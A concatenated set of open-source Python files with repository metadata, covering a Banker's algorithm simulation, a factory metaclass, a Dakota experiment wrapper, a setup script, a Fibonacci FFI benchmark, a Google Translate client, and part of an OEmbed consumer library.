{0: [1, 2, 0, 3], 1: [0, 1, 3, 1], 2: [1, 1, 0, 2], 3: [1, 3, 2, 0],
4: [2, 0, 0, 3]}
"""
return {self.__need().index(i): i for i in self.__need()}
    def main(self, **kwargs) -> None:
        """
        Utilize various methods in this class to simulate the Banker's algorithm
        Return: None
        >>> BankersAlgorithm(test_claim_vector, test_allocated_res_table,
        ...    test_maximum_claim_table).main(describe=True)
        Allocated Resource Table
        P1 2 0 1 1
        <BLANKLINE>
        P2 0 1 2 1
        <BLANKLINE>
        P3 4 0 0 3
        <BLANKLINE>
        P4 0 2 1 0
        <BLANKLINE>
        P5 1 0 3 0
        <BLANKLINE>
        System Resource Table
        P1 3 2 1 4
        <BLANKLINE>
        P2 0 2 5 2
        <BLANKLINE>
        P3 5 1 0 5
        <BLANKLINE>
        P4 1 5 3 0
        <BLANKLINE>
        P5 3 0 3 3
        <BLANKLINE>
        Current Usage by Active Processes: 8 5 9 7
        Initial Available Resources: 1 2 2 2
        __________________________________________________
        <BLANKLINE>
        Process 3 is executing.
        Updated available resource stack for processes: 5 2 2 5
        The process is in a safe state.
        <BLANKLINE>
        Process 1 is executing.
        Updated available resource stack for processes: 7 2 3 6
        The process is in a safe state.
        <BLANKLINE>
        Process 2 is executing.
        Updated available resource stack for processes: 7 3 5 7
        The process is in a safe state.
        <BLANKLINE>
        Process 4 is executing.
        Updated available resource stack for processes: 7 5 6 7
        The process is in a safe state.
        <BLANKLINE>
        Process 5 is executing.
        Updated available resource stack for processes: 8 5 9 7
        The process is in a safe state.
        <BLANKLINE>
        """
        need_list = self.__need()
        alloc_resources_table = self.__allocated_resources_table
        available_resources = self.__available_resources()
        need_index_manager = self.__need_index_manager()
        # Any keyword passed as True (e.g. describe=True) triggers the
        # table printout before the simulation starts.
        for kw, val in kwargs.items():
            if kw and val is True:
                self.__pretty_data()
        print("_" * 50 + "\n")
        # Classic Banker's safety loop: repeatedly find a process whose
        # remaining need fits in the available pool, "run" it, and reclaim
        # its allocation.  If a full pass finds none, the state is unsafe.
        while need_list:
            safe = False
            for each_need in need_list:
                execution = True
                for index, need in enumerate(each_need):
                    if need > available_resources[index]:
                        # This process cannot run with what is currently free.
                        execution = False
                        break
                if execution:
                    safe = True
                    # get the original index of the process from ind_ctrl db
                    # NOTE(review): identical need rows all compare equal here,
                    # so duplicate processes can be reported with the wrong
                    # number -- verify against __need_index_manager.
                    for original_need_index, need_clone in need_index_manager.items():
                        if each_need == need_clone:
                            process_number = original_need_index
                    print(f"Process {process_number + 1} is executing.")
                    # remove the process run from stack
                    need_list.remove(each_need)
                    # update available/freed resources stack
                    available_resources = np.array(available_resources) + np.array(
                        alloc_resources_table[process_number]
                    )
                    print(
                        "Updated available resource stack for processes: "
                        + " ".join([str(x) for x in available_resources])
                    )
                    break
            if safe:
                print("The process is in a safe state.\n")
            else:
                print("System in unsafe state. Aborting...\n")
                break
def __pretty_data(self):
"""
Properly align display of the algorithm's solution
"""
print(" " * 9 + "Allocated Resource Table")
for item in self.__allocated_resources_table:
print(
f"P{self.__allocated_resources_table.index(item) + 1}"
+ " ".join(f"{it:>8}" for it in item)
+ "\n"
)
print(" " * 9 + "System Resource Table")
for item in self.__maximum_claim_table:
print(
f"P{self.__maximum_claim_table.index(item) + 1}"
+ " ".join(f"{it:>8}" for it in item)
+ "\n"
)
print(
"Current Usage by Active Processes: "
+ " ".join(str(x) for x in self.__claim_vector)
)
print(
"Initial Available Resources: "
+ " ".join(str(x) for x in self.__available_resources())
)
time.sleep(1)
# Run the embedded doctests (e.g. in BankersAlgorithm.main) when this file
# is executed directly rather than imported.
if __name__ == "__main__":
    import doctest

    doctest.testmod()
| {
"repo_name": "TheAlgorithms/Python",
"path": "other/dijkstra_bankers_algorithm.py",
"copies": "1",
"size": "8466",
"license": "mit",
"hash": -6763355121744329000,
"line_mean": 36.6266666667,
"line_max": 88,
"alpha_frac": 0.5302386015,
"autogenerated": false,
"ratio": 4.16019656019656,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.519043516169656,
"avg_score": null,
"num_lines": null
} |
"""A python implementation of the factory design pattern. It's designed for use as a base class
for various types of data gateways.
"""
from __future__ import absolute_import, division, print_function
from .compat import with_metaclass
from .exceptions import InitializationError
__all__ = ['Factory']
class FactoryBase(object):
    """Base class for the factory objects that ``FactoryType`` attaches to
    each gateway base class.

    The metaclass supplies two class attributes on every concrete factory:
    ``providers`` (provider name -> provider class) and ``cache``.
    ``initialize`` must be called once before ``get_instance`` can be used.
    """

    @classmethod
    def initialize(cls, context, default_provider):
        """Record *context* and the default provider name.

        *default_provider* may be given as a class or as a name string; it
        must already be registered, otherwise RuntimeError is raised.
        """
        cls.context = context
        cls._default_provider = (default_provider.__name__ if isinstance(default_provider, type)
                                 else str(default_provider))
        if not cls.is_registered_provider(cls._default_provider):
            raise RuntimeError("{0} is not a registered provider for "
                               "{1}".format(cls._default_provider, cls.__name__))

    @classmethod
    def get_instance(cls, provider=None):
        """Instantiate *provider* (or the default provider when None),
        passing the stored context to its constructor."""
        if not hasattr(cls, 'context'):
            # Bug fix: the message previously hard-coded "RecordRepoFactory",
            # which is wrong for every other factory built from this base.
            raise InitializationError("{0} has not been initialized.".format(cls.__name__))
        provider = provider.__name__ if isinstance(provider, type) else provider or cls._default_provider  # noqa
        return cls.providers[provider](cls.context)

    @classmethod
    def get_registered_provider_names(cls):
        """Return the registered provider names (dict key view/list)."""
        return cls.providers.keys()

    @classmethod
    def get_registered_providers(cls):
        """Return the registered provider classes (dict value view/list)."""
        return cls.providers.values()

    @classmethod
    def is_registered_provider(cls, provider):
        """True if *provider* (class or name) is registered on this factory."""
        if isinstance(provider, type):
            provider = provider.__name__
        return provider in cls.get_registered_provider_names()
class FactoryType(type):
    """Metaclass that wires gateway classes into the factory pattern.

    The first class created with this metaclass whose ``factory`` attribute
    is still None becomes the "base" gateway and receives a freshly built
    factory class (a ``FactoryBase`` subclass).  Every later subclass is
    registered on that factory as a provider under its own class name,
    unless it opts out via ``skip_registration``.
    """

    def __init__(cls, name, bases, attr):
        super(FactoryType, cls).__init__(name, bases, attr)
        # Only honor skip_registration when set on this exact class, not
        # when inherited.
        if 'skip_registration' in cls.__dict__ and cls.skip_registration:
            pass  # we don't even care  # pragma: no cover
        elif cls.factory is None:
            # this must be the base implementation; add a factory object
            cls.factory = type(cls.__name__ + 'Factory', (FactoryBase, ),
                               {'providers': dict(), 'cache': dict()})
            if hasattr(cls, 'gateways'):
                cls.gateways.add(cls)
        else:
            # must be a derived object, register it as a provider in cls.factory
            cls.factory.providers[cls.__name__] = cls

    def __call__(cls, *args):
        # Instantiating the *base* gateway class routes through its factory
        # (args[0], when truthy, selects the provider by name or class).
        if 'factory' in cls.__dict__:
            if args and args[0]:
                return cls.factory.get_instance(args[0])
            else:
                return cls.factory.get_instance()
        else:
            # Derived provider classes construct normally; when 'do_cache'
            # is set, at most one instance per class name is kept in the
            # factory's cache.
            if not getattr(cls, 'do_cache', False):
                return super(FactoryType, cls).__call__(*args)
            cache_id = "{0}".format(cls.__name__)
            try:
                return cls.factory.cache[cache_id]
            except KeyError:
                instance = super(FactoryType, cls).__call__(*args)
                cls.factory.cache[cache_id] = instance
                return instance
@with_metaclass(FactoryType)
class Factory(object):
    """Concrete base for factory-managed gateway hierarchies.

    Subclass this to define a gateway family; further subclasses of your
    gateway are auto-registered as providers by ``FactoryType``.
    """
    # The Factory base itself must never be registered as a provider.
    skip_registration = True
    factory = None

# ## Document these ##
# __metaclass__
# factory
# skip_registration
# gateways
# do_cache
# TODO: add name parameter --give example from transcomm client factory
| {
"repo_name": "Microsoft/PTVS",
"path": "Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/conda/_vendor/auxlib/factory.py",
"copies": "9",
"size": "3232",
"license": "apache-2.0",
"hash": -8980421693201650000,
"line_mean": 34.1304347826,
"line_max": 113,
"alpha_frac": 0.6048886139,
"autogenerated": false,
"ratio": 4.373477672530447,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0006187398211624897,
"num_lines": 92
} |
"""A Python interface to a Dakota input file."""
import os
import importlib
class Experiment(object):
    """An aggregate of control blocks that define a Dakota input file."""

    blocks = ("environment", "method", "variables", "interface", "responses")
    """The named control blocks of a Dakota input file."""

    def __init__(
        self,
        component=None,
        plugin=None,
        environment="environment",
        method="vector_parameter_study",
        variables="continuous_design",
        interface="direct",
        responses="response_functions",
        **kwargs
    ):
        """Create the set of control blocks for a Dakota experiment.
        Called with no parameters, a Dakota experiment with basic defaults
        (a vector parameter study with the built-in `rosenbrock` example)
        is created.
        Parameters
        ----------
        component : str, optional
            Name of CSDMS component which Dakota is analyzing (default
            is None). The `component` and `plugin` parameters are
            exclusive.
        plugin : str, optional
            Name of a plugin model which Dakota is analyzing (default
            is None). The `component` and `plugin` parameters are
            exclusive.
        environment : str, optional
            Type of environment used in Dakota experiment (default is
            'environment').
        method : str, optional
            Type of method used in Dakota experiment (default is
            'vector_parameter_study').
        variables : str, optional
            Type of variables used in Dakota experiment (default is
            'continuous_design').
        interface : str, optional
            Type of interface used in Dakota experiment (default is
            'direct').
        responses : str, optional
            Type of responses used in Dakota experiment (default is
            'response_functions').
        **kwargs
            Arbitrary keyword arguments.
        Examples
        --------
        Create a generic Dakota experiment:
        >>> x = Experiment()
        Create a vector parameter study experiment:
        >>> x = Experiment(method='vector_parameter_study')
        """
        self.component = component
        self.plugin = plugin
        # Bug fix: the old test `(component and plugin) is not None` also
        # raised when component was a falsy non-None value with plugin unset;
        # only raise when BOTH are actually provided.
        if self.component is not None and self.plugin is not None:
            raise AttributeError("The component and plugin attributes are exclusive.")
        if self.component is not None:
            interface = "fork"
            kwargs.setdefault("analysis_driver", "dakota_run_component")
        if self.plugin is not None:
            interface = "fork"
            kwargs.setdefault("analysis_driver", "dakota_run_plugin")
        if method == "multidim_parameter_study":
            # Sensible default bounds for the 2-D rosenbrock example.
            kwargs.setdefault("lower_bounds", (-2.0, -2.0))
            kwargs.setdefault("upper_bounds", (2.0, 2.0))
        # Map each block name to the module chosen for it; replaces the
        # previous eval(section) lookup of the same-named local variable.
        selected = {
            "environment": environment,
            "method": method,
            "variables": variables,
            "interface": interface,
            "responses": responses,
        }
        for section in Experiment.blocks:
            cls = self._import(section, selected[section], **kwargs)
            setattr(self, "_" + section, cls)

    @staticmethod
    def _check_block_type(value, current):
        """Raise TypeError unless *value* is an instance of *current*'s base
        class (the abstract base for that block type)."""
        supr = current.__class__.__bases__[0]
        if not isinstance(value, supr):
            raise TypeError("Must be a subclass of " + str(supr))

    @property
    def environment(self):
        """The environment control block."""
        return self._environment

    @environment.setter
    def environment(self, value):
        """Set the environment control block.
        Parameters
        ----------
        value : obj
            An environment control block object, an instance of a
            subclass of dakotathon.environment.base.EnvironmentBase.
        """
        self._check_block_type(value, self._environment)
        self._environment = value

    @property
    def method(self):
        """The method control block."""
        return self._method

    @method.setter
    def method(self, value):
        """Set the method control block.
        Parameters
        ----------
        value : obj
            A method control block object, an instance of a
            subclass of dakotathon.method.base.MethodBase.
        """
        self._check_block_type(value, self._method)
        self._method = value

    @property
    def variables(self):
        """The variables control block."""
        return self._variables

    @variables.setter
    def variables(self, value):
        """Set the variables control block.
        Parameters
        ----------
        value : obj
            A variables control block object, an instance of a
            subclass of dakotathon.variables.base.VariablesBase.
        """
        self._check_block_type(value, self._variables)
        self._variables = value

    @property
    def interface(self):
        """The interface control block."""
        return self._interface

    @interface.setter
    def interface(self, value):
        """Set the interface control block.
        Parameters
        ----------
        value : obj
            An interface control block object, an instance of a
            subclass of dakotathon.interface.base.InterfaceBase.
        """
        self._check_block_type(value, self._interface)
        self._interface = value

    @property
    def responses(self):
        """The responses control block."""
        return self._responses

    @responses.setter
    def responses(self, value):
        """Set the responses control block.
        Parameters
        ----------
        value : obj
            A responses control block object, an instance of a
            subclass of dakotathon.responses.base.ResponsesBase.
        """
        self._check_block_type(value, self._responses)
        self._responses = value

    def _get_subpackage_namespace(self, subpackage):
        """Build the dotted module path for *subpackage* within this package."""
        return os.path.splitext(self.__module__)[0] + "." + subpackage

    def _import(self, _subpackage, _module, **kwargs):
        """Import the block module named *_module* from *_subpackage* and
        instantiate the class it declares via its ``classname`` attribute."""
        namespace = self._get_subpackage_namespace(_subpackage) + "." + _module
        module = importlib.import_module(namespace)
        cls = getattr(module, module.classname)
        return cls(**kwargs)

    def __str__(self):
        """The contents of the Dakota input file represented as a string.

        The output starts with a '# Dakota input file' header followed by
        the string form of each control block, in `blocks` order.
        """
        s = "# Dakota input file\n"
        for section in self.blocks:
            s += str(getattr(self, section))
        return s
| {
"repo_name": "csdms/dakota",
"path": "dakotathon/experiment.py",
"copies": "1",
"size": "7896",
"license": "mit",
"hash": 3412289276435128000,
"line_mean": 29.4864864865,
"line_max": 79,
"alpha_frac": 0.5586372847,
"autogenerated": false,
"ratio": 4.7594936708860756,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 259
} |
"""A Python interface to the SocketLabs API.
See:
http://www.socketlabs.com/api-reference/
https://github.com/MattHealy/socketlabs-python
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
# Directory containing this setup script; README.md is resolved relative
# to it so the build works from any working directory.
base_dir = path.abspath(path.dirname(__file__))

# Reuse the README as the long description shown on PyPI.
with open(path.join(base_dir, 'README.md'), encoding='utf-8') as readme:
    long_description = readme.read()

setup(
    name='socketlabs',
    version='0.1.1',
    description='A Python interface to the SocketLabs API.',
    long_description=long_description,
    url='https://github.com/MattHealy/socketlabs-python',
    author='Matt Healy',
    author_email='healmatt@gmail.com',
    license='MIT',
    classifiers=[
        'Development Status :: 1 - Planning',
        'Intended Audience :: Developers',
        'Topic :: Communications :: Email',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.5',
    ],
    keywords='socketlabs email',
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    install_requires=['requests>=2.5.4.1'],
)
| {
"repo_name": "MattHealy/socketlabs-python",
"path": "setup.py",
"copies": "1",
"size": "1190",
"license": "mit",
"hash": 2466200014788747000,
"line_mean": 29.5128205128,
"line_max": 65,
"alpha_frac": 0.6756302521,
"autogenerated": false,
"ratio": 3.6728395061728394,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.4848469758272839,
"avg_score": null,
"num_lines": null
} |
# A python library comparing the result of FFI imported Rust code to native
# code. It assumes you have the library at /tmp/fibonacci.so
#
# The results are as expected, except for the fast implementation. This could
# be because the overhead of doing the system call takes far longer than the
# running of the python function.
from ctypes import cdll
import time
# Load the compiled Rust shared library; it must be built separately and
# placed at /tmp/fibonacci.so (see header comment).
lib = cdll.LoadLibrary("/tmp/fibonacci.so")
def fib_count(n):
    """Iteratively compute the n-th Fibonacci number (fib(1) == fib(2) == 1).

    Returns 0 for n < 1, mirroring the recursive variants in this file.
    """
    if n < 1:
        return 0
    if n < 3:
        return 1
    # Slide a (prev, curr) pair forward; after n - 2 steps curr == fib(n).
    prev, curr = 1, 1
    for _ in range(n - 2):
        prev, curr = curr, prev + curr
    return curr
def fib_recursive(n):
    """Naive doubly-recursive Fibonacci; exponential time, used as a
    baseline against the Rust FFI implementation."""
    if n <= 0:
        return 0
    return 1 if n == 1 else fib_recursive(n - 1) + fib_recursive(n - 2)
def fib_recursive_hash(n):
    """Recursive Fibonacci with memoization; returns 0 for n < 1.

    Bug fix: the original used ``h.get(k - 1, f(k - 1))``, but dict.get
    evaluates its default argument eagerly, so the recursive call ran even
    on a cache hit and the memo never saved any work (the function was
    still exponential).  The cache is now consulted before recursing.
    """
    memo = {}

    def fib(k):
        if k < 1:
            return 0
        if k < 2:
            return 1
        if k not in memo:
            memo[k] = fib(k - 1) + fib(k - 2)
        return memo[k]

    return fib(n)
# Benchmark driver: for each implementation pair (Rust via FFI vs. the
# Python equivalent above), time one call at the same n and report the gap.
fib_num = 35

print("All values count fibonacci for n={}".format(fib_num))

# Naive recursion: Rust vs. Python.
t = float(time.time())
lib.fibonacci_recursive(fib_num)
rt = float(time.time()) - t
print("Time Taken for recursive: {} seconds".format(rt))
t = float(time.time())
fib_recursive(fib_num)
pt = float(time.time()) - t
print("Time Taken for python recursive: {} seconds".format(pt))
print("Difference: {} milli seconds".format((pt - rt)*1000))
print("")

# Memoized recursion: Rust vs. Python.
t = float(time.time())
lib.fibonacci_hash_recursive(fib_num)
rt = float(time.time()) - t
print("Time Taken for hash: {} seconds".format(rt))
t = float(time.time())
fib_recursive_hash(fib_num)
pt = float(time.time()) - t
print("Time Taken for python recursive hash: {} seconds".format(pt))
print("Difference: {} milli seconds".format((pt - rt)*1000))
print("")

# Iterative ("fast") version: Rust vs. Python.  As noted in the header,
# FFI call overhead may dominate the Rust timing at this size.
t = float(time.time())
lib.fibonacci_fast(fib_num)
rt = float(time.time()) - t
print("Time Taken for fast: {} seconds".format(rt))
t = float(time.time())
fib_count(fib_num)
pt = float(time.time()) - t
print("Time Taken for python fast: {} seconds".format(pt))
print("Difference: {} milli seconds".format((pt - rt)*1000))
print("")
print("done!")
| {
"repo_name": "gevious/rust",
"path": "Projects/fibonacci/fib.py",
"copies": "1",
"size": "2180",
"license": "mit",
"hash": 5070413256843912000,
"line_mean": 23.2222222222,
"line_max": 77,
"alpha_frac": 0.6068807339,
"autogenerated": false,
"ratio": 2.9619565217391304,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.406883725563913,
"avg_score": null,
"num_lines": null
} |
"""A python library for interacting with the Google Translate API.
"""
__author__ = "Dan Drinkard <dan.drinkard@gmail.com"
__version__ = "0.1.0"
__copyright__ = "Copyright (c) 2012 Dan Drinkard"
__license__ = "BSD"
import urllib
import urllib2
try:
import json
except ImportError:
import simplejson as json
class GTranslatorError(Exception):
    """Raised for any Translate API failure: missing API key, HTTP errors,
    malformed urls, or unsupported HTTP verbs."""
class GTranslatorAPIResponse(object):
    """Lightweight wrapper exposing API response fields as attributes."""

    def __init__(self, **kwargs):
        # Promote every response field to an instance attribute.
        for field, value in kwargs.items():
            setattr(self, field, value)

    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self.__dict__)
class GTranslation(GTranslatorAPIResponse):
    """Response object for translations (Translator.translate)."""

class GLanguage(GTranslatorAPIResponse):
    """Response object for language detection and supported-language
    listings (Translator.detect / Translator.languages)."""
class Translator(object):
    """Client for the Google Translate REST API (v2).

    NOTE(review): this module is Python 2 only (print statements,
    urllib/urllib2, comma-style except clauses).
    """

    version = 'v2'
    base_uri = "https://www.googleapis.com/language/translate"

    def __init__(self, **kwargs):
        # A Google Services API key is required before any call().
        self.key = kwargs.get('key', None)

    def call(self, method, **kwargs):
        """Perform one API request and return the raw response body.

        ``method`` is the API path appended to the base URI ('' for
        translate, 'detect', 'languages').  Remaining kwargs become query
        parameters, except the pseudo-parameters 'method' (HTTP verb,
        default GET) and 'timeout' (seconds, default 3), which are popped
        before the request is built.  Raises GTranslatorError on a missing
        key, HTTP errors, bad urls, or unsupported verbs.
        """
        if self.key is None:
            raise GTranslatorError('Missing Google Services API key.')
        url = "%s/%s/%s" % (self.base_uri, self.version, method)
        kwargs.update(key=self.key)
        request_method = kwargs.get('method', 'GET')
        # Pop the HTTP-verb pseudo-parameter so it is not sent as a query arg.
        if 'method' in kwargs.keys():
            request_method = kwargs['method']
            del kwargs['method']
        if 'timeout' in kwargs.keys():
            timeout = kwargs['timeout']
            del kwargs['timeout']
        else:
            timeout = 3
        try:
            if request_method == 'GET':
                url = "%s?%s" % (url, urllib.urlencode(kwargs))
                if kwargs.get('debug'):
                    print 'calling %s' % url
                response = urllib2.urlopen(url, None, timeout).read()
            elif request_method == 'POST':
                print 'calling %s...' % url
                response = urllib2.urlopen(url, urllib.urlencode(kwargs), timeout).read()
            else:
                raise GTranslatorError('HTTP verbs other than GET and POST aren\'t implemented.')
        except urllib2.HTTPError, e:
            raise GTranslatorError(e)
        except ValueError, e:
            raise GTranslatorError(e)
        return response

    def translate(self, text, **kwargs):
        """Translate *text*; returns a single GTranslation, or a list when
        the API returns several translations."""
        kwargs.update(q=text)
        response = json.loads(self.call('', **kwargs))
        results = [GTranslation(**translation) for translation in response['data']['translations']]
        if len(results) == 1:
            return results[0]
        return results

    def detect(self, text, **kwargs):
        """Detect the language of *text*; returns a flat list of GLanguage."""
        kwargs.update(q=text)
        response = json.loads(self.call('detect', **kwargs))
        results = []
        # TODO: WHY does this method return a list of lists? In what circumstances are both dimensions used?
        for detections in response['data']['detections']:
            results += [GLanguage(**language) for language in detections]
        return results

    def languages(self, **kwargs):
        """List the languages supported by the API as GLanguage objects."""
        response = json.loads(self.call('languages', **kwargs))
        results = [GLanguage(**language) for language in response['data']['languages']]
        return results
| {
"repo_name": "drinks/pyglot",
"path": "pyglot.py",
"copies": "1",
"size": "3195",
"license": "bsd-3-clause",
"hash": -7063105025376513000,
"line_mean": 30.95,
"line_max": 108,
"alpha_frac": 0.59342723,
"autogenerated": false,
"ratio": 4.165580182529335,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5259007412529335,
"avg_score": null,
"num_lines": null
} |
'''A Python library that implements an OEmbed consumer to use with OEmbed providers.
Based on reference from http://oembed.com/
oEmbed is a format for allowing an embedded representation of a URL on
third party sites. The simple API allows a website to display embedded content
(such as photos or videos) when a user posts a link to that resource, without
having to parse the resource directly.
OEmbed format authors:
* Cal Henderson (cal [at] iamcal.com)
* Mike Malone (mike [at] pownce.com)
* Leah Culver (leah [at] pownce.com)
* Richard Crowley (r [at] rcrowley.org)
Simple usage:
import oembed
consumer = oembed.OEmbedConsumer()
endpoint = oembed.OEmbedEndpoint('http://www.flickr.com/services/oembed',
['http://*.flickr.com/*'])
consumer.addEndpoint(endpoint)
response = consumer.embed('http://www.flickr.com/photos/wizardbt/2584979382/')
print response['url']
import pprint
pprint.pprint(response.getData())
Copyright (c) 2008 Ariel Barmat, abarmat@gmail.com
Copyright (c) 2010 Mathijs de Bruin, drbob@dokterbob.net
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE
'''
import urllib
import urllib2
import logging
import re
import simplejson
try:
from xml.etree import cElementTree as etree
except ImportError:
# Running Python < 2.4 so we need a different import
import cElementTree as etree
__author__ = 'drbob@dokterbob.net'
__version__ = '0.2'
class OEmbedError(Exception):
    '''Base class for OEmbed errors (bad responses, mime-types, fetching).'''

class OEmbedInvalidRequest(OEmbedError):
    '''Raised when an invalid parameter is used in a request'''

class OEmbedNoEndpoint(OEmbedError):
    '''Raised when no endpoint is available for a particular URL'''
class OEmbedResponse(object):
    '''
    Base class for all OEmbed responses.
    This class provides a factory of OEmbed responses according to the format
    detected in the type field. It also validates that mandatory fields are
    present.
    '''
    def _validateData(self, data):
        # Subclasses override this to enforce their mandatory fields.
        pass

    def __getitem__(self, name):
        # Missing fields yield None rather than raising.
        return self._data.get(name)

    def __iter__(self):
        return self.iterkeys()

    def iterkeys(self):
        return self._data.iterkeys()

    def getData(self):
        return self._data

    def loadData(self, data):
        self._validateData(data)
        self._data = data

    @classmethod
    def createLoad(cls, data):
        # 'type' picks the concrete response class; 'version' is required
        # by the OEmbed spec.
        if not data.has_key('type') or \
           not data.has_key('version'):
            raise OEmbedError('Missing required fields on OEmbed response.')
        response = cls.create(data['type'])
        response.loadData(data)
        return response

    @classmethod
    def create(cls, responseType):
        # Unknown types fall back to the generic OEmbedResponse.
        return resourceTypes.get(responseType, OEmbedResponse)()

    @classmethod
    def newFromJSON(cls, raw):
        data = simplejson.loads(raw)
        return cls.createLoad(data)

    @classmethod
    def newFromXML(cls, raw):
        elem = etree.XML(raw)
        # Flatten the XML document into a tag->text dict, skipping the
        # <oembed> root element itself.
        data = dict([(e.tag, e.text) for e in elem.getiterator() \
                     if e.tag not in ['oembed']])
        return cls.createLoad(data)
class OEmbedPhotoResponse(OEmbedResponse):
    '''
    This type is used for representing static photos.
    '''
    def _validateData(self, data):
        OEmbedResponse._validateData(self, data)
        # A photo resource must carry the image url and its dimensions.
        for field in ('url', 'width', 'height'):
            if field not in data:
                raise OEmbedError('Missing required fields on OEmbed photo response.')
class OEmbedVideoResponse(OEmbedResponse):
    '''
    This type is used for representing playable videos.
    '''
    def _validateData(self, data):
        OEmbedResponse._validateData(self, data)
        # Embeddable video needs its markup plus display dimensions.
        for field in ('html', 'width', 'height'):
            if field not in data:
                raise OEmbedError('Missing required fields on OEmbed video response.')
class OEmbedLinkResponse(OEmbedResponse):
    '''
    Responses of this type allow a provider to return any generic embed data
    (such as title and author_name), without providing either the url or html
    parameters. The consumer may then link to the resource, using the URL
    specified in the original request.
    '''
    # No extra mandatory fields beyond the base 'type'/'version' check.
class OEmbedRichResponse(OEmbedResponse):
    '''
    This type is used for rich HTML content that does not fall under
    one of the other categories.
    '''
    def _validateData(self, data):
        OEmbedResponse._validateData(self, data)
        # Rich embeds require markup and its display dimensions.
        for field in ('html', 'width', 'height'):
            if field not in data:
                raise OEmbedError('Missing required fields on OEmbed rich response.')
# Maps the OEmbed 'type' field to the response class used to represent it;
# consulted by OEmbedResponse.create().
resourceTypes = {
    'photo': OEmbedPhotoResponse,
    'video': OEmbedVideoResponse,
    'link': OEmbedLinkResponse,
    'rich': OEmbedRichResponse
}
class OEmbedEndpoint(object):
    '''
    A class representing an OEmbed Endpoint exposed by a provider.
    This class handles a number of URL schemes and manage resource retrieval.
    '''

    def __init__(self, url, urlSchemes=None):
        '''
        Create a new OEmbedEndpoint object.
        Args:
            url: The url of a provider API (API endpoint).
            urlSchemes: A list of URL schemes for this endpoint.
        '''
        self._urlApi = url
        self._urlSchemes = {}
        self._initRequestHeaders()
        self._urllib = urllib2
        if urlSchemes is not None:
            # NOTE(review): map() is lazy on Python 3, so schemes would never
            # register there; this module targets Python 2 (has_key, urllib2).
            map(self.addUrlScheme, urlSchemes)
        # True when the API url embeds a '{format}' placeholder that
        # request() must substitute.
        self._implicitFormat = self._urlApi.find('{format}') != -1

    def _initRequestHeaders(self):
        # Default headers: just a library-identifying User-Agent.
        self._requestHeaders = {}
        self.setUserAgent('python-oembed/' + __version__)

    def addUrlScheme(self, url):
        '''
        Add a url scheme to this endpoint. It takes a url string and create
        the OEmbedUrlScheme object internally.
        Args:
            url: The url string that represents a url scheme to add.
        '''
        #@todo: validate invalid url format according to http://oembed.com/
        if not isinstance(url, str):
            raise TypeError('url must be a string value')
        if not self._urlSchemes.has_key(url):
            self._urlSchemes[url] = OEmbedUrlScheme(url)

    def delUrlScheme(self, url):
        '''
        Remove an OEmbedUrlScheme from the list of schemes.
        Args:
            url: The url used as key for the urlSchems dict.
        '''
        if self._urlSchemes.has_key(url):
            del self._urlSchemes[url]

    def clearUrlSchemes(self):
        '''Clear the schemes in this endpoint.'''
        self._urlSchemes.clear()

    def getUrlSchemes(self):
        '''
        Get the url schemes in this endpoint.
        Returns:
            A dict of OEmbedUrlScheme objects. k => url, v => OEmbedUrlScheme
        '''
        return self._urlSchemes

    def match(self, url):
        '''
        Try to find if url matches against any of the schemes within this
        endpoint.
        Args:
            url: The url to match against each scheme
        Returns:
            True if a matching scheme was found for the url, False otherwise
        '''
        for urlScheme in self._urlSchemes.itervalues():
            if urlScheme.match(url):
                return True
        return False

    def request(self, url, **opt):
        '''
        Format the input url and optional parameters, and provides the final url
        where to get the given resource.
        Args:
            url: The url of an OEmbed resource.
            **opt: Parameters passed to the url.
        Returns:
            The complete url of the endpoint and resource.
        '''
        params = opt
        params['url'] = url
        urlApi = self._urlApi
        # Providers with '{format}' in their API url take the format in the
        # path rather than as a query parameter.
        if params.has_key('format') and self._implicitFormat:
            urlApi = self._urlApi.replace('{format}', params['format'])
            del params['format']
        return "%s?%s" % (urlApi, urllib.urlencode(params))

    def get(self, url, **opt):
        '''
        Convert the resource url to a complete url and then fetch the
        data from it.
        Args:
            url: The url of an OEmbed resource.
            **opt: Parameters passed to the url.
        Returns:
            OEmbedResponse object according to data fetched
        '''
        return self.fetch(self.request(url, **opt))

    def fetch(self, url):
        '''
        Fetch url and create a response object according to the mime-type.
        Args:
            url: The url to fetch data from
        Returns:
            OEmbedResponse object according to data fetched
        '''
        opener = self._urllib.build_opener()
        opener.addheaders = self._requestHeaders.items()
        response = opener.open(url)
        headers = response.info()
        raw = response.read()
        if not headers.has_key('Content-Type'):
            raise OEmbedError('Missing mime-type in response')
        # Dispatch on Content-Type to choose the XML or JSON parser.
        if headers['Content-Type'].find('application/xml') != -1 or \
           headers['Content-Type'].find('text/xml') != -1:
            response = OEmbedResponse.newFromXML(raw)
        elif headers['Content-Type'].find('application/json') != -1 or \
             headers['Content-Type'].find('text/json') != -1 or \
             headers['Content-Type'].find('application/x-json') != -1:
